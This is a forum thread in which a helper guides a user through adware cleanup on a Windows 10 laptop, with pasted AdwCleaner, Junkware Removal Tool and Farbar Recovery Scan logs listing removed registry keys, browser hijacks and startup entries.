[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\NowUSeeItPlayer
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\INSTALLPATH\STATUS
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\YTDownloader
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\AppDataLow\Software\Yahoo\Companion
[#] Key deleted on reboot: HKCU\Software\DAILYPCCLEAN
[#] Key deleted on reboot: HKCU\Software\DriverRestore
[#] Key deleted on reboot: HKCU\Software\eSupport.com
[#] Key deleted on reboot: HKCU\Software\GlobalUpdate
[#] Key deleted on reboot: HKCU\Software\Microsoft\Tinstalls
[#] Key deleted on reboot: HKCU\Software\ParetoLogic
[#] Key deleted on reboot: HKCU\Software\powerpack
[#] Key deleted on reboot: HKCU\Software\PRODUCTSETUP
[#] Key deleted on reboot: HKCU\Software\ProfessionalCleaningSoftwareLanguage
[#] Key deleted on reboot: HKCU\Software\SlimWare Utilities Inc
[#] Key deleted on reboot: HKCU\Software\speedypc software
[#] Key deleted on reboot: HKCU\Software\Store
[#] Key deleted on reboot: HKCU\Software\TNT2
[#] Key deleted on reboot: HKCU\Software\tstamptoken
[#] Key deleted on reboot: HKCU\Software\WTools
[#] Key deleted on reboot: HKCU\Software\Yahoo\Companion
[#] Key deleted on reboot: HKCU\Software\Yahoo\YFriendsBar
[#] Key deleted on reboot: HKCU\Software\NowUSeeItPlayer
[#] Key deleted on reboot: HKCU\Software\INSTALLPATH\STATUS
[#] Key deleted on reboot: HKCU\Software\YTDownloader
[#] Key deleted on reboot: HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key deleted: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key deleted: HKLM\SOFTWARE\{F2E9660B-98AF-42c0-8258-9CDDF07BF95D}
[-] Key deleted: HKLM\SOFTWARE\GlobalUpdate
[-] Key deleted: HKLM\SOFTWARE\MetaStream
[-] Key deleted: HKLM\SOFTWARE\NetTcpHandler
[-] Key deleted: HKLM\SOFTWARE\NtSvcHandler
[-] Key deleted: HKLM\SOFTWARE\ParetoLogic
[-] Key deleted: HKLM\SOFTWARE\Professional Cleaning Software
[-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key deleted: HKLM\SOFTWARE\speedypc software
[-] Key deleted: HKLM\SOFTWARE\Viewpoint
[-] Key deleted: HKLM\SOFTWARE\Yahoo\Companion
[-] Key deleted: HKLM\SOFTWARE\YTDownloader
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ViewpointMediaPlayer
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{730E03E4-350E-48E5-9D3E-4329903D454D}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C0AFC06A-6C9E-420F-AABF-B1AC7EE1F589}
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate
[#] Key deleted on reboot: [x64] HKCU\Software\DAILYPCCLEAN
[#] Key deleted on reboot: [x64] HKCU\Software\DriverRestore
[#] Key deleted on reboot: [x64] HKCU\Software\eSupport.com
[#] Key deleted on reboot: [x64] HKCU\Software\GlobalUpdate
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Tinstalls
[#] Key deleted on reboot: [x64] HKCU\Software\ParetoLogic
[#] Key deleted on reboot: [x64] HKCU\Software\powerpack
[#] Key deleted on reboot: [x64] HKCU\Software\PRODUCTSETUP
[#] Key deleted on reboot: [x64] HKCU\Software\ProfessionalCleaningSoftwareLanguage
[#] Key deleted on reboot: [x64] HKCU\Software\SlimWare Utilities Inc
[-] Key deleted: [x64] HKCU\Software\speedypc software
[#] Key deleted on reboot: [x64] HKCU\Software\Store
[#] Key deleted on reboot: [x64] HKCU\Software\TNT2
[#] Key deleted on reboot: [x64] HKCU\Software\tstamptoken
[#] Key deleted on reboot: [x64] HKCU\Software\WTools
[#] Key deleted on reboot: [x64] HKCU\Software\Yahoo\Companion
[#] Key deleted on reboot: [x64] HKCU\Software\Yahoo\YFriendsBar
[#] Key deleted on reboot: [x64] HKCU\Software\NowUSeeItPlayer
[#] Key deleted on reboot: [x64] HKCU\Software\INSTALLPATH\STATUS
[#] Key deleted on reboot: [x64] HKCU\Software\YTDownloader
[#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\Software\Yahoo\Companion
[-] Key deleted: [x64] HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key deleted: [x64] HKLM\SOFTWARE\DriverRestore
[-] Key deleted: [x64] HKLM\SOFTWARE\WebBar
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Driver Restore
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{70AA5E57-6A21-42B8-9B5F-8F071CC265AD}
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\75E5AA0712A68B24B9F5F870C12C56DA
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\75E5AA0712A68B24B9F5F870C12C56DA
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\75E5AA0712A68B24B9F5F870C12C56DA
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
[-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\SearchScopes\{1B687A8D-64D5-4CAD-B865-D4512F4B23DD}
[-] Key deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{1B687A8D-64D5-4CAD-B865-D4512F4B23DD}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77F8667C-BC7F-4CCB-B5BD-96659BD2F0DE}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{1B687A8D-64D5-4CAD-B865-D4512F4B23DD}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{9a216821-0ec5-49a3-85ac-fb72ae79a1e8}
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{21464931-263a-4a60-930e-a79b690b399f} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c} [NameServer]
[-] Data restored: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{21464931-263a-4a60-930e-a79b690b399f} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{3e5366e2-e619-4c7e-a254-4148181480bb} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{797fc918-2a02-4a5f-9f81-cc4932956ea0} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{a1c95c13-acd4-4e93-88c9-2912fbc94e6c} [NameServer]
[-] Data restored: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{c1fd1c83-dc19-4fbd-a13f-ebdcb53d58b0} [NameServer]
[-] Value deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Windows\CurrentVersion\Run [NowUSeeIt Player]
[-] Value deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [NowUSeeIt Player]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [NowUSeeIt Player]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [NowUSeeIt Player]
[-] Value deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [NowUSeeIt Player]
[-] Value deleted: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Windows\CurrentVersion\Run [SlimCleaner Plus]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [SlimCleaner Plus]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [SlimCleaner Plus]
[-] Key deleted: HKCU\Software\Classes\AppID\ShopAtHomeHelper.EXE
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [Selection Tools.exe]
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [wb.exe]
[-] Key deleted: HKLM\SOFTWARE\MozillaPlugins\@viewpoint.com/VMP
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\DriverRestore.exe
[-] Value deleted: HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [WeatherBug.exe]
[#] Value deleted on reboot: HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [wb.exe]
[#] Value deleted on reboot: HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION [Selection Tools.exe]
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
[#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
[-] Key deleted: HKCU\Software\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg
[-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg
[#] Key deleted on reboot: [x64] HKCU\Software\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg
[-] Key deleted: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\kofkpgiaknijknhajbhnghkodiccblkg


***** [ Web browsers ] *****

[-] Chrome preferences cleaned: "browser.startup.homepage" - "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
[-] Chrome preferences cleaned: "browser.startup.homepage" - "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome"
[-] Chrome preferences cleaned: "browser.search.selectedEngine" - "Search Provided by Yahoo"
[-] Chrome preferences cleaned: "keyword.URL" - "hxxp://aolsearch.aol.com/aol/search?invocationType=client_searchbox&query="
[-] Chrome preferences cleaned: "browser.search.defaultenginename" - "Search Provided by Yahoo"
[-] [C:\Users\Randy\AppData\Local\Chromium\User Data\Default] [extension] Deleted: kofkpgiaknijknhajbhnghkodiccblkg
[-] [C:\Users\Randy\AppData\Local\Chromium\User Data\Default] [homepage] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D1%26b%3Dchmm%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&uref=chmm
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search provided by yahoo.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search.yahoo.com
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [startup_urls] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuFhCJrEQv%2Fc%2BX2qZcHHjPPs%2Bq5PxEnDevcjOXYLyIHaBnM0IoJ8MqMcKnm8tCbPzRbgJMRuO8J430v3e4Ts%2F%2BpSpNuZ2wz8ISRKpXfOt2Mn1ECKZer7C78v27A4TWru%2BOJphUGzd3uNG%2Bbj9taw10baItFUSSmTPZfB91iIJ4NZHs%3D
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [startup_urls] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_instlmtrx_16_07&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyByE0EyDyEtAtBtA0D0C0E0Azz0E0AyEtN0D0Tzu0StCyDtDyCtN1L2XzutAtFtCzztFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDyEzz0DyDzy0B0FtGyD0E0CyDtGzytA0BtCtGtAtC0E0AtG0CyB0D0AtC0ByByCzytCyEyE2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyEtAyC0F0ByByD0EtG0BtAtDzytGyE0F0DyCtGzyyD0C0EtGzzzz0EtCyByDyByCyBtByE0D2QtN0A0LzutB%26cr%3D1936506275%26a%3Dwncy_instlmtrx_16_07%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: kofkpgiaknijknhajbhnghkodiccblkg
[-] [C:\Users\Randy\AppData\Local\Google\Chrome\User Data\Default] [homepage] Deleted: hxxps://us.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=86311316&param1=y6bdVFVIsvuYsgEClQfz8HyFH9tZCHsOZFHNP%2BYwJC1YN8j239I6Mjyd7vNuRVuF4vDPXvI545K5Lk0yZuaPTEZETNhOb%2FBJMlU3cWrtE3B5LPuATRj4TiQDTLE5W%2F6T1gG3gr%2B63Fuf4DJw3bmxC%2BZWeGECWX8xosk8oaYOJhVzfdn7C0MU8tFOhlX0D867I7w%2FY3BPKDl2YWznSMNnMNhdfhuhn%2BhoVJITdlVyN5g%3D


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [33818 Bytes] - [11/02/2017 18:11:15]
C:\AdwCleaner\AdwCleaner[R0].txt - [2767 Bytes] - [12/09/2014 16:43:22]
C:\AdwCleaner\AdwCleaner[S0].txt - [2597 Bytes] - [12/09/2014 16:45:13]
C:\AdwCleaner\AdwCleaner[S1].txt - [29934 Bytes] - [11/02/2017 17:49:07]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [34112 Bytes] ##########

 

[glhglh]

JRT:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.0 (12.05.2016)
Operating System: Windows 10 Home x64
Ran by Randy (Administrator) on Sat 02/11/2017 at 18:20:10.04
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 34

Failed to delete: C:\Program Files (x86)\speedypc software (Folder)
Successfully deleted: C:\ProgramData\28341ff220e0446c9fff27c4493d622e (Folder)
Successfully deleted: C:\ProgramData\pc drivers headquarters (Folder)
Successfully deleted: C:\ProgramData\speedypc software (Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{0DA28192-C8DF-4A02-90B1-EAF920C85944} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{1F55E6FA-1426-4897-B666-A3E6A30B840E} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{297860A2-6C9A-4CB6-8FB1-2A9CD97407F6} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{3BC0DD74-3709-4627-ADC3-455494AFD0D8} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{423A682D-48A0-4F57-B2E1-620C03ABD442} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{49E8E75A-954B-4D52-9B14-DBD1DF88C87D} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{4DF64422-DCE4-45C4-831A-8D14E1555A8D} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{4F4EBB35-A8AA-41A6-A95E-8977156A1F43} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{6382432F-F59C-4DAE-AF83-BBFE84C2F3B0} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{7864F51F-109C-4D91-99CA-960B5DCEFB5D} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{7D9F120B-5910-436B-9C04-DD2B6A52C364} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{8C314D96-8AD3-4F69-B94B-9AC40CBB89F5} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{B5EB4976-E1A7-4AC3-AA4D-FEE8B10E0FE9} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{BD0C7B1E-BA5F-44BB-BA70-4F2EFB7F4489} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{CD61501A-DCE9-4A43-994F-C918C85D4E8A} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{D1854D6F-BD77-4CA6-9759-668855379765} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{DD18E879-34ED-41C5-AD8A-F93E41CDF570} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{E4E4034A-F34A-49F0-99F7-6BA42CE440F5} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{E812227F-F832-43FD-8726-024ECC8496A6} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{F693923A-D158-4524-AF89-B727FCC67C46} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\{FC16AD97-C30B-4AB5-BFD1-6F7D30630C45} (Empty Folder)
Successfully deleted: C:\Users\Randy\AppData\Local\installer (Folder)
Successfully deleted: C:\Users\Randy\Appdata\LocalLow\company (Folder)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\{7affbfae-c4e2-4915-8c0f-00fa3ec610a1} (Folder)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\extensions\staged (Folder)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\searchplugins\aolsearch.xml (File)
Successfully deleted: C:\Users\Randy\AppData\Roaming\Mozilla\Firefox\Profiles\w1n6vmjf.default\user.js (File)
Successfully deleted: C:\WINDOWS\system32\Tasks\SpeedFixToolPro_Start (Task)
Successfully deleted: C:\Program Files\comodo\geekbuddy (Folder)
Successfully deleted: C:\Users\Randy\desktop\Continue Flash Player Updater Installation.lnk (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sat 02/11/2017 at 18:24:41.69
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

[glhglh]

After all this I tried RogueKiller and Mbam again, but the same error messages.

 

[Broni]

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

• Double click to run it.
• Make sure you checkmark Addition.txt box.
• Press Scan button.
• Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

 

[glhglh]

Frst:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 12-02-2017
Ran by Randy (administrator) on HP-RRR (11-02-2017 20:20:08)
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(SpeedyPC Software) C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-01-04] (IDT, Inc.)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-01-19] (Atheros Commnucations)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-04-27] (Synaptics Incorporated)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [576568 2011-11-29] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HostManager] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\AOLSoftware.exe [41800 2010-03-07] (AOL Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1160408 2016-12-17] (Adobe Systems Incorporated)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [HP OfficeJet 3830 series (NET)] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\ScanToPCActivationApp.exe [3651080 2015-03-09] (Hewlett-Packard Development Company, LP)
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\Run: [Chromium] => c:\users\randy\appdata\local\chromium\application\chrome.exe [1043456 2016-01-26] (The Chromium Authors)
